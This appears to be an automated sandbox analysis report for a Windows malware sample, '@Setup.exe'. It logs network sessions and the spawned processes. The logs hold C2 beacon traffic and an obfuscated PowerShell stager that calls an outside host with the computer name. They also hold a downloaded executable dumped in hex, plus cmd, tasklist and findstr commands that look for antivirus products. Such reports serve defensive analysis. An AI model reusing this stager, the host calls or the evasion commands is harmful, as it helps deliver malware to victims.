                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PuJU6H%2Fl384QsJb%2F4%2BtbZuYjlip88IgR1Qg6TaztfyBJgOiNFetpLqt5Z9RKnbZtrEnb2NQWUARW0R%2FKOiQFHvGhxuqZKDIRRf90pG7%2B%2FQtqo%2B7zboJtL19WXnLxTdCWkmzAVoQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9ade743ac68cda-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1836&min_rtt=1836&rtt_var=689&sent=298&recv=602&lost=0&retrans=0&sent_bytes=2847&recv_bytes=585795&delivery_rate=1586094&cwnd=242&unsent_bytes=0&cid=ed141537fa121591&ts=2319&x=0"


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  8192.168.2.449748104.21.32.14433448C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-12-29 15:37:04 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 113
                                                                                                                                                  Host: battlecaredh.click
                                                                                                                                                  2024-12-29 15:37:04 UTC113OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 31 34 36 35 34 44 46 36 45 41 46 30 46 43 45 36 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41
                                                                                                                                                  Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397&hwid=14654DF6EAF0FCE6BC510B35BBB55F9A
                                                                                                                                                  2024-12-29 15:37:05 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:37:05 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=r89p1je0l0smdkfha1qmk2ims5; expires=Thu, 24 Apr 2025 09:23:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ulPTBbYdxntEETSpsEwXo4PDfHkjW7vperQM7ZLJxdiRchLBwHDqy5JEzD2mihPFGBbKKNZX05CABbQ1oCC8e76nEmBIGDtAfocGRwaVMzIvlpadbC5jx9vAKhl3v9Nzz7Fh7qI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9ade8b8cd072b9-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1770&min_rtt=1762&rtt_var=678&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1016&delivery_rate=1593016&cwnd=214&unsent_bytes=0&cid=6e25b12b6c035dc9&ts=947&x=0"
                                                                                                                                                  2024-12-29 15:37:05 UTC218INData Raw: 64 34 0d 0a 6b 78 33 38 4b 75 4d 6f 6e 38 70 61 4b 48 76 66 2f 79 30 49 79 2f 55 48 42 30 65 68 44 69 46 2f 50 6d 68 70 77 7a 7a 72 5a 56 37 49 5a 74 35 66 77 52 4b 39 6f 69 35 63 43 36 7a 46 63 53 65 58 32 6d 52 69 49 4e 51 67 55 68 64 52 47 44 58 73 42 4e 35 53 61 71 45 72 7a 68 37 58 48 73 50 6c 4b 6b 42 56 71 34 64 5a 4b 75 66 58 59 58 4e 6c 6d 7a 77 4e 58 56 74 4b 55 2f 4a 42 78 78 35 38 35 6a 2f 47 43 49 74 63 36 37 6f 70 45 69 66 77 6f 77 4a 6a 70 35 78 33 63 54 4c 4d 5a 31 49 4b 56 30 59 61 71 31 4f 62 4f 58 48 36 63 34 68 31 67 45 54 76 6c 53 6c 41 47 76 47 4c 56 58 7a 70 32 53 56 68 4d 34 4d 30 45 56 4d 63 44 55 76 35 44 4a 59 34 0d 0a
                                                                                                                                                  Data Ascii: d4kx38KuMon8paKHvf/y0Iy/UHB0ehDiF/PmhpwzzrZV7IZt5fwRK9oi5cC6zFcSeX2mRiINQgUhdRGDXsBN5SaqErzh7XHsPlKkBVq4dZKufXYXNlmzwNXVtKU/JBxx585j/GCItc67opEifwowJjp5x3cTLMZ1IKV0Yaq1ObOXH6c4h1gETvlSlAGvGLVXzp2SVhM4M0EVMcDUv5DJY4
                                                                                                                                                  2024-12-29 15:37:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  9192.168.2.449749185.161.251.214433448C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-12-29 15:37:07 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Host: cegu.shop
                                                                                                                                                  2024-12-29 15:37:08 UTC249INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.26.2
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:37:07 GMT
                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                  Content-Length: 329
                                                                                                                                                  Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  ETag: "676c9e2a-149"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  2024-12-29 15:37:08 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                                                  Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  10192.168.2.449750104.21.37.1284433448C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-12-29 15:37:09 UTC206OUTGET /int_clp_sha.txt HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Host: klipvumisui.shop
                                                                                                                                                  2024-12-29 15:37:10 UTC905INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sun, 29 Dec 2024 15:37:10 GMT
                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                  Content-Length: 8767044
                                                                                                                                                  Connection: close
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  ETag: "51f99eddd33cc04fb0f55f873b76d907"
                                                                                                                                                  Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fl4uE8jgyTxZL6C2y%2BP6ZRqefsSAvmtd5AIcP%2F12lBIjz3WKfGCKv69Xy1yHS%2FUrd88mnzAtHfbMe5evrxq3%2FylVeZIPIY7qluy%2BP6YsE14koi2S3GX7HFdeSKjvjXquRlOe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8f9adeadcc0380cd-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1521&min_rtt=1517&rtt_var=577&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2867&recv_bytes=820&delivery_rate=1883870&cwnd=178&unsent_bytes=0&cid=952d46274a141bca&ts=654&x=0"
                                                                                                                                                  2024-12-29 15:37:10 UTC464INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                  2024-12-29 15:37:10 UTC1369INData Raw: 00 00 00 00 00 00 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b
                                                                                                                                                  Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata`
                                                                                                                                                  2024-12-29 15:37:10 UTC1369INData Raw: 13 40 00 01 07 48 52 45 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 00 00
                                                                                                                                                  Data Ascii: @HRESULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@
                                                                                                                                                  2024-12-29 15:37:10 UTC1369INData Raw: 40 00 4a 00 fe ff 72 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09
                                                                                                                                                  Data Ascii: @Jr@MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(J
                                                                                                                                                  2024-12-29 15:37:10 UTC1369INData Raw: 12 40 00 01 00 01 01 02 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00
                                                                                                                                                  Data Ascii: @[@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessage
                                                                                                                                                  2024-12-29 15:37:10 UTC1369INData Raw: 66 02 00 02 9c 10 40 00 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54 4d 6f 6e 69
                                                                                                                                                  Data Ascii: f@AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMoni
                                                                                                                                                  2024-12-29 15:37:10 UTC1369INData Raw: 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00 00 cc
                                                                                                                                                  Data Ascii: erConstruction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$A
                                                                                                                                                  2024-12-29 15:37:10 UTC1369INData Raw: 08 00 00 00 02 08 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55 53 74
                                                                                                                                                  Data Ascii: VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VUSt
                                                                                                                                                  2024-12-29 15:37:10 UTC1369INData Raw: 00 08 00 00 00 24 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 43 00
                                                                                                                                                  Data Ascii: $@~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@C
                                                                                                                                                  2024-12-29 15:37:10 UTC1369INData Raw: 02 00 01 04 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00
                                                                                                                                                  Data Ascii: L@Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(J


                                                                                                                                                  Click to jump to process

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:10:36:26
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\@Setup.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:73'409'778 bytes
                                                                                                                                                  MD5 hash:C6F709A40A7D35051EE49AD1E367DF65
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:1
                                                                                                                                                  Start time:10:36:27
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c move Pl Pl.cmd & Pl.cmd
                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:2
                                                                                                                                                  Start time:10:36:27
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:3
                                                                                                                                                  Start time:10:36:28
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:tasklist
                                                                                                                                                  Imagebase:0xc90000
                                                                                                                                                  File size:79'360 bytes
                                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:10:36:28
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:5
                                                                                                                                                  Start time:10:36:28
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:tasklist
                                                                                                                                                  Imagebase:0xc90000
                                                                                                                                                  File size:79'360 bytes
                                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:6
                                                                                                                                                  Start time:10:36:28
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:7
                                                                                                                                                  Start time:10:36:29
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:cmd /c md 504701
                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:8
                                                                                                                                                  Start time:10:36:29
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\extrac32.exe
